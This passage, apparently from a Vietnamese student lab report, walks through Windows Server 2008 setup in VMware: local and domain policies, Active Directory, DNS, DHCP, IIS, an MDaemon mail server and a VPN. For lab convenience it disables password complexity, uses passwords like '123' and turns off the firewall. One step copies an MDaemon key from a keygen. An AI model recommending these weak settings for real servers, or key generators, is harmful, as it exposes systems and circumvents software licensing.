từ trước đến giờ. Hệ điều hành này đã được củng cố chắc chắn để giúp bảo vệ chống lại hỏng hóc. Một số công nghệ mới giúp ngăn chặn các kết nối bất hợp pháp tới các mạng, máy chủ, dữ liệu của bạn và các tài khoản người dùng. Chức năng Network Access Protection (NAP) giúp đảm bảo rằng những máy tính nào muốn kết nối với mạng của bạn đều phải tuân thủ chính sách bảo mật của tổ chức. Việc tích hợp công nghệ và nhiều tính năng nâng cao khiến các dịch vụ Active Directory trở thành một giải pháp IDA (Identity and Access - Nhận dạng và Truy cập) tích hợp, hợp nhất và mạnh mẽ. Thêm vào đó, Read-Only Domain Controller (RODC) và Mã hóa ổ đĩa bằng BitLocker cho phép bạn triển khai cơ sở dữ liệu AD một cách bảo mật hơn trên khắp các khu vực của văn phòng chi nhánh.

4.1.2.5 Tính toán hiệu năng caoLợi ích và các khoản tiết kiệm chi phí của Windows Server 2008 mở

rộng tới Windows HPC Server 2008 để phục vụ cho môi trường tính toán hiệu năng cao (HPC) của bạn. Windows HPC Server 2008 được xây dựng trên nền Windows Server 2008, công nghệ 64 bit và có thể mở rộng một cách hiệu quả tới hàng nghìn lõi xử lý với tính năng có sẵn để cải thiện hiệu suất, và giảm tính phức tạp của môi trường HPC. Windows HPC Server 2008 cho phép triển khai rộng rãi hơn bằng cách đem tới cho người dùng cuối những trải nghiệm phong phú và tích hợp, mở rộng từ ứng dụng máy bàn tới các cụm máy, và bao gồm một bộ trọn vẹn các công cụ triển khai, quản trị và giám sát. Các công cụ này dễ triển khai, quản lý và tích hợp với hạ tầng CNTT hiện có của bạn.

4.2 Quá trình làm việc và các kiến thức

4.2.1 Làm việc với Windows Server 2008 trên môi trường máy ảo VMWare

4.2.1.1 Cài đặt VMWARE WORKSTATIONVMware Workstation là một trong những phần mềm tốt nhất để tạo và

quản lý các máy ảo, cho phép người dùng có thể sử dụng được nhiều hệ điều hành khác nhau trên cùng một máy tính. Việc sử dụng các hệ điều hành ảo này sẽ giúp bạn dễ dàng thử nghiệm được các phần mềm cũng như là các hệ điều hành mới trước khi cài đặt chúng chính thức lên máy thật.


VMware Inc. Là một công ty phần mềm lớn vốn thuộc tập đoàn EMC chuyên làm phần mềm tạo máy ảo cho các hệ thống máy tính tương thích chíp x86 của Intel. Sản phẩm chính của công ty bao gồm VMware Workstation cho máy để bàn và VMware ESX server, VMware GSX server cho máy chủ. Các phần mềm tạo máy ảo của VMware được coi là tốt nhất trên thế giới bởi nó hỗ trợ nhiều hệ điều hành khác nhau như GNU/Linux,Mac OS X và Microsoft Windows. Các phần mềm máy ảo khác như Virtual PC chỉ hoạt động trên hệ điều hành Microsoft Windows. Đặc biệt VMware là công ty hàng đầu cung cấp các giải pháp ảo hóa cho các trung tâm dữ liệu với các sản phẩm như : VMware vSphere, VMware vCloud, VMware Director, ....

Sau đây là các bước cài đặt VMware 8:- Bước 1: Mở thư mục chứa file Vmware mới download ở trang chủ

của nó về và nhấp đúp vào file này.- Bước 2: Sau khi nhấp đúp vào file VMware-workstation-full-9.0.0-

812388 một cửa sổ hiện ra nhắc nhở nếu muốn tiếp tục cài đặt thì nhấn Next. Nếu không hãy nhấn Cancel.

Đồng thời cũng lưu ý rằng đây là phần mềm được bảo vệ bởi bộ luật về bản quyền. Các bạn hãy nhấn Next để tiếp tục.

- Bước 3: Cho phép các chọn phương thức cài đặt mặc định hay tùy chỉnh. Nên để mặc định là Typical và click vào biểu tượng này

http://vi.wikipedia.org/wiki/Microsoft_Windows

http://vi.wikipedia.org/w/index.php?title=Virtual_PC&action=edit&redlink=1

http://vi.wikipedia.org/wiki/Microsoft_Windows

http://vi.wikipedia.org/wiki/Mac_OS_X

http://vi.wikipedia.org/wiki/Linux

http://vi.wikipedia.org/w/index.php?title=VMware_GSX_server&action=edit&redlink=1

http://vi.wikipedia.org/w/index.php?title=VMware_ESX_server&action=edit&redlink=1

http://vi.wikipedia.org/w/index.php?title=VMware_ESX_server&action=edit&redlink=1

http://vi.wikipedia.org/w/index.php?title=VMware_Workstation&action=edit&redlink=1

http://vi.wikipedia.org/wiki/Intel

http://vi.wikipedia.org/wiki/M%C3%A1y_t%C3%ADnh

http://vi.wikipedia.org/wiki/M%C3%A1y_t%C3%ADnh

http://vi.wikipedia.org/wiki/Ph%E1%BA%A7n_m%E1%BB%81m

http://vi.wikipedia.org/wiki/EMC_Corporation


- Bước 4: Khi click vào biểu tượng Typical một cửa sổ khác hiện ra cho phép chọn đường dẫn tới thư mục cài đặt của VMware nên để mặc định và nhấn Next.

- Bước 5 : Tại bước này sẽ được nhắc nhở có kiểm tra bản cập nhật của Vmware mỗi khi phần mềm này khởi động hay không. Nếu có thì check vào ô : Check for product updates on start up nếu không muốn có thể bỏ check và nhấn Next.


- Bước 6 : Cửa sổ này thông báo cho các bạn rằng VMware muốn giúp đỡ phát triển và hoàn thiện phần mềm bằng cách gửi các thông tin báo lỗi trong quá trình sử dụng tới nhà sản xuất nên để mặc định và nhấn Next.

- Bước 7 : Bước này hỏi có muốn tạo biểu tượng của phần mềm trên desktop và trong trình đơn start hay không. Nếu không bỏ dấu check và nhấn Next.


- Bước 8 : Xác thực có muốn tiếp tục hay muốn thay đổi một phần nào đó trong quá trình cài đặt. Nếu tiếp tục thì nhấn Continue. Nếu muốn thay đổi nhấn Back, nếu muốn ngừng quá trình cài đặt thì nhấn Cancel. Sau đó, nhấn Continue để tiếp tục quá trình cài đặt.

Sau khi nhấn Continue các bạn chờ khoảng 3-5 phút cho quá trình cài đặt hoàn tất.


- Bước 9 : Lưu ý rằng License này chỉ có hiệu lực trong 30 ngày. Quá 30 ngày các bạn phải tiến hành đăng kí lại để có 1 License mới. Phải nhập key vào để tiếp tục.

- Bước 10 : Nhấn Finish để hoàn thành quá trình cài đặt

Bây giờ các bạn ra màn hình desktop nhấp đúp vào biể tượng của VMware.

Trong lần sử dụng đầu tiên 1 cửa sổ sẽ hiện ra yêu cầu các bạn đồng ý với qui định sử dụng phần mềm của nhà sản xuất. Click Yes, I accept… và nhấn OK.


Một cửa sổ mới hiện ra hiển thị đầy đủ thông tin về số ngày sử dụng phần mềm còn lại các bạn hãy nhấn Close.

4.2.1.2 Cài đặt và cấu hình máy chủ Windows Server 2008Các bước cài đặt Windows Server 2008 (cài đặt trên môi trường máy

ảo VMware):- Mở máy ảo VMware Workstation- Click File New Vitual Machine…- Xuất hiện hộp thoại New Vitual Machine Wizard Click Next>.


- Click Installer disc image file (iso) nếu có file ISO và click Browse.. chọn đường dẫn đến nơi chưa file ISO.Nếu có đĩa Win Server 2008 thì chon Installer disc.

- Nhập Windows Product key rồi Click Next>


- Chọn Location nơi Windows Server sẽ cài đặt vào nơi nào trong ổ đĩa.

- Click Next>

- Nhập dung lượng ổ đĩa vào ô maximum disk size khuyến nghị là 40 GB

- Click Next>


- Click Finish để tiến hành cài đặt.

- Chọn ngôn ngữ cài đặt và click Next.- Bấm nút Install now để bắt đầu cài đặt.- Nhập product key của phiên bản Windows Server 2008 Enterprise

Nếu chưa muốn kích hoạt Windows vì mục đích kiểm tra hoặc dùng thử,


bạn bỏ dấu chọn ở mục Automatically activate Windows then I’m online và bấm nút Next.

- Chọn kiểu cài đặt Windows Server 2008 Enterprise (Full Installation).

- Chọn I accept the license terms và bấm nút Next.- Chọn Custom (advanced)- Chọn phân vùng ổ đĩa cần cài Windows Server 2008 và click Next.- Chờ cho quá trình cài đặt hoàn tất.

- Trong lần đăng nhập đầu tiên, hệ thống yêu cầu bạn thay đổi mật khẩu ngay lập tức

- Bạn bấm OK, nhập mật khẩu mới và bấm phím Enter.


- Như vậy bạn cài đặt hoàn tất Windows Server 2008.

4.2.1.3 Cài đặt LOCAL USER, GROUP, POLICY VÀ SECURITY POLICY

4.2.1.3.1 Triển khai Local User và Group. Chuẩn bị: - Máy Window Sever 2008 (chưa năng cấp Domain ) Sever 1

NIC:192.168.1.1/24- Máy Window XP:PC1

NIC 1:192.168.1.2/24 Mô hình

Mục Tiêu bài LAB:- Tạo local user and group trên máy sever 1- Mục tiêu cuối cùng:các user có thể đăng nhập vào máy sever 1 Lưu ý:- Khi thực hiện trên máy ảo VM-WARE các car mạng sẽ được thiết

lập ở chế độ HOST ONLY- Nên tắt tính năng window Firewall trên các máy sever và PC Thực hiện:- Bước 1( Tạo local user)

Trên máy sever,vào start chọn run rồi gõ lusrmgr.msc để vào local use and groups:


Trong Local uer and groups,chuột phải vào User chọn New tạo 2 User U1 và U2 với pass là 123abc!!!

Tương tự đối với u2

- Bước 2 ( Đăng nhập User vừa tạo trên Sever 1)Đăng nhập vào Sever 1 bằng U 1:


Trong U1,có thể truy cập vào Profile chủa chính mình nhưng không thể truy cập vào Profile của User khác


- Bước 3 ( Tạo Local Group và add User vào Group đó)Trên máy Sever 1,vào start chọn run rồi gõ lusrmgr.msc để vào Local Group and User Group

Trong Local Group and User Group,chuột phải vào Group chọn New Group tạo 2 Group ketoan,nhansu rồi chọn Add để thêm U1 vào Group ketoan và U2 vaog Group nhansu


- Bước 4: Cấu hình cho phép User u1 tự động đăng nhập vào Sever 1 khi khởi động:Trên máy Sever1,vào Start chọn run gồi gõ UserPassword2 để vào Users Accounts

Trong Users Accounts,bỏ check ở phần Users must enter a user name pasword to use this computer rồi chọn Apply

Sau đó nhập tên User và password muốn đăng nhập tự động vào sever1:


Chọn ok ok , sau đó Retstart máy để kiểm tra kết quả

4.2.1.3.2 Triển khai Local Policy Mô hình:

Mục tiêu bài LAB:- Tạo local policy trên máy Sever1 để áp dụng lên từng đối tượng khác

nhau- Mục tiêu cuối cùng:áp dụng các chính sách cho các đối tượng khác

nhau

Lưu ý:- Khi thực hiện trên máy ảo VM-WARE các car mạng sẽ được thiết

lập ở chế độ HOST ONLY- Nên tắt tính năng window Firewall trên các máy sever và PC Các bước thực hiện:- Bước 1: Tạo Group Policy Console cho u2, Administrator, Non -

Administrator


Trên máy Sever1,vào Strart chọn run rồi gõ ccm để vào Console1[Console Root]

Trong Console1[Console Root],chọ File-> Add/Remove Snap-ins

Trong Add/Remove Snap-ins,chọn Group Policy Object rồi chọ Add


Trong Select Group Policy Object,chọn Browes.

Trong Browes for a Group Policy Object rồi chọn sang tab Users để chọn U2:Thực hiện tương tự để cho group Administrator và Non- Administrator


Sauk hi tạo xong U2, Administrator và Non- Administrator,ta sẽ vào file rồi chon Save để lưu lại Console này

- Bước 2: Tạo Group Policy để tắt Shutdow Event Trackker trên Sever1 cho Administrators


Chọn Start-> Run rồi gõ gpedit.msc để vào Local Group Policy Editor

Trong Local Group Policy Editor,chọn Computer Comfiguration->Administrative Templates-> System chọn Dislay Shutdow Event Tracker

Trong Dislay Shutdow Event Tracker Properties,check vào Disabled:


Để update Group policy vừa cấu hình,ta vào Start->run gõ cmd. Sau đó gõ lệnh gpupdate/force:

Test thành công Group Policy vừa tạo:- Bước 3: Tạo Group Policy không cho Group Non-Administrators

truy cập Control Panel


Trên máy Sver,mở lại Group Policy Cosole đã tạo khi nãy rồi chọn Non-Administrators Policy

Trong Non-Administrators policy,chọn Use Configuration->Administrative Templates->Control Panel chọn Prohibit access to the Contro Panel:


Trong Prohibit access to the Control Panel Properties,chọn Enabled:

Để update group policy vừa cấu hình,ta vào Start->Run gõ cmd.Sau đó gõ lệnh gpupdate/force:


Test Group Policy vừa tạo bằng cách đăng nhập vào u1 và u3 để kiểm tra sẽ không thấy Control Panel:

- Bước 4 Cấu hình group policy không hiển thị Recycle Bin khi User u2 đăng nhập Sever 1Trên máy Sever1,mở lại Group Policy Console đã tạo khi nảy rồi chọn U2 policy


Trong U2 Policy,chọn User Configuration->Administrative Templates->Desktop rồi chọn Remove Recycle Bin icon from desktop:

Trong Remove Recyde Bin icon from desktop properties chọn Enabled:


Để update group policy vừa cấu hình, ta vào start->run gõ cmd. Sau đó gõ lệnh gpupdate/force:

Test Group policy vừa tạo bằng cách đăng nhập vào U2 để kiểm tra sẽ không thấy icon Recycle Bin


4.2.1.3.3 Local Security policy Mô hình:

Mục Tiêu bài LAB:- Tạo local Security Policy trên máy Sever1 để áp dụng chính sách cho

các User- Mục tiêu cuối cùng: Áp dụng được các chính sách an ninh cho các

user Lưu ý- Khi thực hiện trên máy ảo VM-WARE các car mạng sẽ được thiết

lập ở chế độ HOST ONLY- Nên tắt tính năng window Firewall trên các máy sever và PC Thực hiện:- Bước 1: Cho Phép tạo User với password đơn giản

Trên máy Sever1,vào Start chon Run rồi gõ lusrmgr.msc để vào Local Users and Groups:


Trong Local User And Group, tạo mới User U1,với password đơn giản là 123 sẽ báo lỗi là pasword không đủ độ phức tạp

Trên máy Sever 1, vào Start chọn Run rồi gõ secpol.msc để vào Local Security Policy


Trong Local Security Policy,chọn Account -> Passwword Policy->Password must meet complexity requirements:

Trong Password must meet complexity requirements,chọn Disable,sau đó

Apply rồi ok


Để update security policy vừa cấu hình, ta vào Start->Run gõ gpupdate /force rồi Enter.

Test Security policy vừa tạo bằng cách tạo lại User lest1 với passwords đơn giản là 123


- Bước 2: Tạo 1 Security Policy khóa 1 User nếu đăng nhập vào sever1 sai 3 lần

Trong Local Security Policy, chọn Account Policies-> Account Lockout Policy,tiếp theo ta sẽ cấu hình 3 mục là:Account lockout duration,Account lockout threshold và Reset account lockout counter after

Trong Account lockout duration Properties( quy định thời gian khóa user đăng nhập sai 3 lân),gõ số phút mà bạn muốn xóa user vào phần Account is locked out for:


Trong Reset account lockout counter after ( quy định thời gian reset user đã bị khóa vào phần Reset account lock out counter after)

Trong Reset account lockout counter after ( quy định thời gian reset user đã bị khóa do đăng nhập sai 3 lần),gõ số phút mà bạn muốn reset user bị khóa vào phần Reset account lock out counter after:


Để update security policy vừa cấu hình, ta vào Start->Run gõ gpupdate/force rồi Enter

Test security vừa tạo bằng cách đăng nhập 1 User sai quá 3 lần và đây là thông báo lỗi của User lest1


Trong Local User and Group của Administrator,ta sẽ thấy lest1 bị khóa như sau

- Bước 3: Tạo Security Policy cho phép tất cả các User đều có quyền tắt máyĐầu tiên ta đăng nhập user1 sẽ không thấy quyền tắt máy


Trên máy sever1 vào Start chọn Run rồi gõ secpol.msc để vào local Security Policy

Trong Local Security Policy, chọn Local Policies->User Rights Assignment->Shutdown the systen


Trong Shutdown the system Properties, chọn Add User or Group và ở ô Enter the object names to select ta gõ Everyone rồi OK-> OK

Để update security policy vừa cấu hình, ta vào Start->Run gõ gpupdate /force rồi Enter.


Test security policy vừa tạo bằng cách đăng nhập vào 1 user bất kì để kiểm tra quyền tắt máy:


4.2.1.4 Nâng cấp Domain Contronller và Join domain Chuẩn bị:

- Máy Windows Server 2008 (chưa nâng cấp Domain) NIC 1: 192.168.1.1/24 - Máy Windows XP: PC 1 NIC 1: 192.168.1.2/24

Mục tiêu bài LAB: - Cài Domain Controller trên máy server1 và tiến hành join PC1 vào

domain và đăng nhập - Domain Administrator để sử dụng Administrative Tools cho máy

PC1. - Mục tiêu cuối cùng: cài đặt Domain Controller và join PC1 vào

domain thành công. Lưu ý: - Khi thực hiện trên máy ảo VM-ware, các card mạng sẽ thiết lập ở chế

độ HOST ONLY,- Nên tắt tính năng Windows Firewall trên các máy Server và PC. Thực hiện:- Bước 1: cài đặt Domain Controller trên máy server1

Trước khi cài đặt, ta đặt địa chỉ IP cho máy và trên cấu hình Preferred DNS server trên card mạng trỏ về máy Server (192.168.1.1):


Lúc này vào menu Start, gõ lệnh dcpromo vào hộp tìm kiếm. Thao tác này sẽ khởi chạy Welcome to the Active Directory Domain Service Installation Wizard. Nhấn Next.


Sau đó tiếp tục nhấn Next.

Trong khung Choose a Deployment Configuration ta chọn Create a new domain in a new forest. Sau đó nhấn Next tiếp tục.


Trong khung Name the Forest Root Domain, nhập vào tên của miền trong hộp nhập liệu FQDN of the forest room domain. Nhấn Next để tiếp tục.

Trong khung Set Forest Functional Level, chọn Windows Server 2008. Nhấn Next để tiếp tục.


Trong khung Additional Domain Controller Options, ta để mặc định và nhấn Next.

Sau đó trong phần Active Directory Domain Services Installation Wizard, ta chọn Yes:


Trong cửa sổ Location for Database, log Files, và SYSVOL, ta chọn Next để tiếp tục quá trình cài đặt:

Trong cửa sổ Directory Services Restore Mode Administrator Password, ta gõ password muốn sử dụng để quản trị domain này vào ô Password & Confirm password rồi chọn Next:


Trong cửa sổ Summary, ta tiếp tục nhấn Next.

Sau đó, ta check vào tùy chọn Reboot on completion để hệ thống tự động restart sau khi hoàn thành quá trình nâng cấp Domain Controller.


Kết quả: Domain từ WORDGROUP đã chuyển thành tên domain đã tạo (athena.edu.vn).

- Bước 2: cấu hình Default Policy để cho phép tạo user với password đơn giảnTrong máy Server, vào Start Run và gõ dsa.msc để truy cập vào Active Directory Users and Computers để bắt đầu tạo user với password đơn giản:

Trong Active Directory Users and Computers, chuột phải vào Users chọn New -> User. Trong New Object - User, ta gõ tên user là u1:


Trong New Object - User, ta gõ password là 123 và bỏ check ở User must change password at next logon:


Trong New Object – User, ta chọn Finish để kết thúc và sẽ nhận được 1 thông báo lỗi do password không đủ độ phức tạp:

Để thay đổi Default Policy, trên máy server ta vào Start -> Administrative Tools -> Group Policy Management:


Trong Group Policy Management, ta chọn Forest: athena.edu.vn -> Domain -> athena.edu.vn. Sau đó chuột phải vào Default Domain Policy và chọn Edit:


Trong Group Policy Management Editor, ta chọn Computer Configuration -> Policies -> Windows Settings -> Security Settings -> Account Policies -> Password Policy. Trong Password Policy, ta cấu hình Enforce password history, Maximum password age, Minimum password age, Minimum password length =0 và trong Password must meet complexity requirement, ta chọn Disabled để cho phép tạo user có password đơn giản:


Để update chỉnh sửa policy vừa cấu hình, ta vào Start -> Run và gõ “gpupdate /force”:

Vào Start -> Run và gõ “dsa.msc” để truy cập vào Active Directory Users and Computers.

Trong Active Directory Users and Computers, chuột phải vào Users chọn New -> User. Trong New Object - User, ta gõ tên user là u1:


Trong New Object - User, ta gõ password là 123 và bỏ check ở User must change password at next logon sau đó nhấn Next , rồi chọn Finish.


User u1 được tạo thành công.


- Bước 3: cấu hình Default Domain Controller Policy để cho phép user bình thường có thể đăng nhập vào local.Trên máy server, đăng nhập bằng user u1/123 vừa tạo khi nãy:


Đăng nhập bị báo lỗi do theo mặc định user bình thường không thể log on local:

Trên máy server, vào Start -> Administrative Tools -> Group Policy Management. Trong Group Policy Management, ta chọn Forest: athena.edu.vn -> Domain -> athena.edu.vn. Sau đó vào Domain Controllers rồi chuột phải vào Default Domain Policy và chọn Edit:


Trong Group Policy Management Editor, ta chọn Computer Configuration -> Policies -> Windows Settings -> Security Settings -> Local Policies -> User Rights Assignment:


Trong Allow log on locally -> Properties, thêm nhóm users vào danh sách cho phép đăng nhập local:


Để update chỉnh sửa policy vừa cấu hình, ta vào Start -> Run và gõ “gpupdate /force”:

Bây giờ trên máy server, ta đăng nhập lại user u1/123 vừa tạo khi nãy:


Và user u1 đã đăng nhập thành công vào máy server:

- Bước 4: Join domain cho máy client PC1


Trên máy PC, cấu hình Preferred DNS server trên card mạng trỏ về máy server (192.168.1.1):

Trước khi Join domain ta sẽ ping IP máy PC qua máy Server:

Ping thành công ta Join domain cho máy client PC bằng cách chuột phải vào My Computer chọn Properties. Trong System Properties ta sang tab Computer Name rồi chọn Change. Trong Computer Name Changes, ta check vào ô Domain rồi gõ athena.edu.vn và chọn OK. Trong Computer Name Changes, ta gõ username/password để cho phép PC join domain:


Máy PC đã join domain thành công.


4.2.1.5 Triển khai dịch vụ DNS- DNS (Domain Name System) Server là máy chủ được dùng để phân

giải domain thành địa chỉ IP và ngược lại. Ví dụ: athena.edu.vn là 173.214.177.90

- Về cách thức hoạt động, DNS Server lưu trữ một cơ sở dữ liệu bao gồm các bản ghi DNS và dịch vụ lắng nghe các yêu cầu.Khi máy client gửi yêu cầu phân giải đến, DNS Server tiến hành tra cứu trong cơ sở dữ liệu và gửi kết quả tương ứng về máy client.

Mô hình:

Lưu ý:- Nếu thực hiện bài trên môi trường máy ảo VM-ware - Các card mạng để ở chế độ Host-only - Nên tắt tường lửa trên Server và PC Các bước thực hiện:- Bước 1: Cài đặt dịch vụ DNS

Start menu > Administrative tools > Server Manager

Chọn DNS Server > Next > Next > Install - Bước 2: Cấu hình DSN Zones và kiểm tra


Start menu > Administrative Tools > DSN

R-Click Forward Lookup Zone > New Zone…

Click Next


Chọn Primary zone > Next

Click Next


Click Next

Click Next


Click Finish

- Bước 3: Cấu hình Zone

R-Click Zone: athena.edu.vn > New Host (A or AAAA)…


Name: Để trống IP address: 192.168.1.1 (IP của máy đang chạy IIS) Ta sẽ kiểm tra bằng cách trên máy sever1 vào Start chọn run gõ cmd

Trên máy Xp ta cũng kiểm tra tương tự


4.2.1.6 Triển khai dịch vụ DHCP- DHCP (Dynamic Host Configuration Protocol) Server là máy chủ

được dùng để cấp phát địa chỉ IP động cho các máy trạm trong một hệ thống mạng. Trên các phiên bản trước như Windows 2000 Server hay Windows Server 2003, bạn đã quen thuộc với chức năng này.

- Về cách thức hoạt động, DHCP Server sử dụng dịch vụ cùng tên để lắng nghe yêu cầu xin cấp phát địa chỉ IP được gởi từ máy trạm. Sau khi nhận yêu cầu, DHCP Server sẽ chọn ra một địa chỉ IP trong dãy địa chỉ của mình và gời về cho máy trạm. Đồng thời, DHCP Server cũng gởi đến máy trạm các thông tin liên quan đến địa chỉ IP như subnet mask, địa chỉ IP của các DNS Server, default gateway, …Đối với Windows Server 2008, cách thức cài đặt và cấu hình được mô tả chi tiết ngay sau đây.

Chuẩn bị: - Máy Windows Server 2008: Server 1

NIC 1: 192.168.1.1/24 - Máy Windows XP: PC 1

NIC 1: IP nhận động Mô hình:


Mục tiêu: - Xây dựng máy chủ dịch vụ cấp phát địa chỉ IP động cho các máy

trong mạng LAN. Lưu ý: - Nếu thực hiện trên VW-Ware thì phải tắt tính năng DHCP trong mục

Virtual Network Editor. - Trong cùng một hệ thống, chỉ sử dụng một DHCP - Server để cấp

phát IP. Thực hiện: - Bước 1: Cài đặt dịch vụ DHCP trong Server Roles.

Start Menu > Adminsitrative tools > Server Manager

Click Add Roles.


Click chọn DHCP Server > Next


Chọn chính xác card mạng mà ta muốn cấp phát IP thông qua nó! > Next

Thông tin Domain, Primary DNS, Altenate DNS. Ví dụ: Domain Athena.edu.vn, DNS: 192.168.1.1 > Next


DHCP Scopes > Click Add Scope

Điền thông tin Scope. > OK > Next


IP version 6: Disable > Next > Install > Close- Bước 2: Kiểm tra IP được cấp trên máy Windows XP

IP đã nhận chính xác từ DHCP - Server


4.2.1.7 Web Server Chuẩn bị:

- Máy Windows Server 2008: Server 1 - Máy Windows XP: PC 1 Mô hình LAB

Mục tiêu bài LAB: Cài đặt dịch vụ IIS trên Windows Server 2008 Ứng dụng dịch vụ IIS để triển khai Web Server và FTP Server

Thực hiện: Bước 1: Cài đặt IIS Start menu > Administrative tools > Server Manager

Click Add Roles


Click chọn: Web Server (IIS)

Chọn Add Required Features Click NEXT > NEXT


Click chọn FTP Publishing Service

Click Add Required Services Click Next > InstallBước 2: Tạo một trang Web và kiểm tra Tạo thư mục chứa trang Web đường dẫn: C:\athena\ Trong thư mục "C:\athena\" tạo một File tên: "index.htm"


Edit file này với Notepad và thêm nội dung là: Welcome to Athena.edu.vn >Save fileĐăng ký trang web này với IIS để truy cập bằng dịch vụ web. Start menu > Administrative > IIS

R-Click vào Sites > Add Web Site…


Site name: athena Physical path: C:\athena > OKLưu ý: Khi thực hiện tạo web site mới trên cùng một cổng 80 thì sẽ bị trùng với trang Default Web Site, cho nên ta phải Stop trang Default hoặc xóa nó đi. Kiểm tra: Mở trình duyệt Web gỏ vào địa chỉ: 192.168.1.1 để xem kết quả

. Bước 3: Tạo một FTP Site và kiểm tra Start menu > Administrative tools > IIS


Chọn FTP Sites > Click here to lauch

R-Click FTP Site > New > FTP Site


Click NEXT >

Đặt tên cho FTP Site > Next


Click Next

Chọn Do not isolate users > Next


Chọn đường dẫn thư mục Home của FTP site > Next

READ : Chỉ đọc WRITE: Cho phép ghi dữ liệu > Next > Finish


Lưu ý quan trọng: FTP site mới nếu sử dụng cổng mặc định là 21 thì sẽ bị trùng với các FTP Site khác cũng chung cổng 21. Trong cùng một thời điểm chỉ có một FTP site được chạy trên cùng một cổng. Kiểm tra: Trên Windows XP - PC 1 Mở trình windows explorer: gỏ vào ô địa chỉ đường dẫn sau để truy cập FTP Site: ftp://192.168.1.1 Tạo một thư mục trên FTP Site

4.2.1.8 Mail ServerMail Server chứa mailbox của người dùng. Mail Server nhận mail từ

mail Client gửi đến và đưa vào Mail Server nhận mail từ Mail Host gửi

đến và đưa vào mailbox của người dùng. Người dùng sử dụng NFS

(Network File System) để mount thư mục chứa mailbox trên Mail

Serverđể đọc. Nếu NFS không được hỗ trợ thì người dùng phải login vào


Mail Server để nhận thư.Trong trường hợp Mail Client hỗ trợ POP/IMAP

và trên Mail Server cũng hỗ trợ POP/IMAP thì người dùng có thể đọc thư

bằng POP/IMAP.

Cài đặt Mail Mdeamon

-> Next

Để mặc định rồi Next


Tiếp theo ta chọn mục keygen, ta coppy cái key vào Installation Type,sau đó chọn I already have a registrtion key(enter it here)

Điền thông tin ở phần Registration Information


Gõ tên Domain: Athena.edu.vn


Điền thông tin

Điền thông tin địa chỉ IP


Trên máy Sever vào Start Mdaemon

Tiếp tục để mặc định rồi Next -> Finish


Xuất hiện hộp thoại,vào Accounts chọn Accounts settings


Bỏ click chuột vào phần Require strong passwords

Tiếp vào Account chọn New Account,điền tên và pass địa chỉ mail tk1->ok

Ta làm tương tự cho tk2,


Sau đó,về lại máy Xp để thực hiện việc gởi và nhận mail


Tiếp tục mặc định chọn Next

Trước khi gởi mail ta sẽ phải nhập name Display


Sau đó điền địa chỉ Email

Gõ địa chỉ IP của Mail sever


Nhập Pass

Chọn Create Mail để sọa thư gởi


Ta sẽ nhận được mail bên máy Xp2,với nội dung là xin chao bạnTiếp tục tương tự ta sẽ thực hiện gởi mail từ máy Xp2 sang Xp1 với nội dung thư “da nhan duoc”

Tiếp tục kiểm tra thư bên máy Xp1


Như vậy đã hoàn thành quá trình gởi và nhận mail trên 2 máy Xp1 và XP2

4.2.1.9 VPNVPN - Client to Site

Chuẩn bị: - Máy Windows Server 2008: Server 1 NIC 1: 192.168.1.1/24 (NAT) NIC 2: 10.0.0.1/8 (Host Only) - Máy Windows XP: PC 1 NIC 1: 192.168.1.2/24 (NAT) - Máy Windows XP: PC 2 NIC 1: 10.0.0.2/8 (Host only) Mô hình:

Mục tiêu bài LAB: - Cài đặt Routing and Remote Access (LAN routing, VPN)


- Cấu hình VPN cho phép PC 1 có thể truy cập vào máy PC 2. - Kiểm tra dịch vụ bằng thư mục chia sẻ trên PC 1.

Thực hiện: Bước 1: Cài đặt Routing and Remote Access Trên máy Server 1, Server 2 tiến hành cài đặt dịch vụ Routing And Remote Access. Vào Start Menu > Administrative Tools > Server Manager bấm vào add Roles

Chọn Next


Click chọn Network Policy and Access Services. > Next > Next


Click chọn Routing and Remote Access Services. > Next > Install. Click Close sau khi cài xong. Bước 2: Cấu hình Routing and Remote Access. Thực hiện trên Server 1 Vào Start Menu > Administrative Tools > Routing and Remote Access.


Click phải chuột vào Server > Configure and Enable Routing Remote Accessc

Click Next


Chọn dòng Custom configuration > Next


Chọn hai mục: VPN Access và LAN routing > Next > Finish > Start Service

R- Click Server > Propertices


Click chọn: Static address pool > Click Add

Điền range IP: Start IP address: 192.168.1.50 End IP address: 192.168.1.100


> OK > OK Bước 3: Tạo tài khoản trên Server và cấp quyền truy cập VPN Start menu > Administrative tools > Server Manager

Trong nhánh Configuration > Local Users and Group R-Click vào Users > New User


Điền thông tin user > Create > Close

R-Click vào User vpn > Propertices


Trong thẻ Dial- in Click chọn: Allow access > OK Bước 4: Tạo kết nối VPN trên máy PC 2: Trên máy PC 2 Start menu > Settings > Control Panel > Network and internet connection

Chọn mục: Create a connection to the network at your workplace


Chọn mục: Virtual Private Network connection > Next

Điền thông tin công ty: Athena > Next


Điền IP của Server: 10.0.0.1 (Đây là IP NIC 2 của Server 1) > Next

Chọn Add a shorcut to connection to my desktop > Finish


R-Click vào "Athena" chọn Connect

Điền thông tin user name và password > Connect


Trên máy PC 2 tiến hành ping kiểm tra kết nối đến máy PC 1

Tín hiệu phản hồi từ PC 2 là rất tốt. Bước 5: Share thư mục trên PC 1 và tiến hành truy cập từ PC 2


Share thành công. Kết thúc phần LAB VPN - Client to Site

4.2.2 Làm việc với Winsdows Server 2008 trên máy chủ ảo VPS (Virtual private server)

4.2.2.1 Mail Server trên máy chủ ảo VPSMô hình:

Mục tiêu:- Cài đặt dịch vụ Mail Server (sử dụng phần mềm Mdeamon_Mail) trên máy chủ ảo (VPS)- Thực hiện kiểm tra gửi mail tới các tài khoản Gmail, Yahoo mail… và ngược lạiLưu ý: Nếu thực hiện bài trên môi trường máy ảo VM-Ware


- Các card mạng để ở chế độ Host – Only- Nên tắt tường lửa trên Server và PCThực hiện:- Bước 1: Cài đặt phần mềm Mdeamon_Mail- Bước 2: Cấu hình Mdeamon_Mail- Bước 3: Tạo tài khoản trên Mdeamon_MailBước 1: Cài đặt phần mềm Mdeamon_MailĐăng nhập máy chủ ảo VPS bằng công cụ Remote Desktop.Dowload bộ cài đặt Mdeamon và chạy file Setup.exeTrước tiên, bạn tải phiên bản MDaemon Mail Server mới nhất và bắt đầu quá trình cài đặt.Bấm "Next" để tiếp tục.

Đánh dấu vào ô "I have read and I agree with all the terms of this license agreement"


Chọn đường dẫn lưu trữ của chương trình, mặc định sẽ là ổ C hệ thống (ổ đĩa có cài hệ điều hành Microsoft Windows).

Lựa chọn phiên bản cài đặt, nếu bạn có key đăng ký thì nhập vào ô phía dưới. Ở ví dụ sử dụng là phiên bản free hoặc miễn phí 30 ngày của phiên bản Pro.


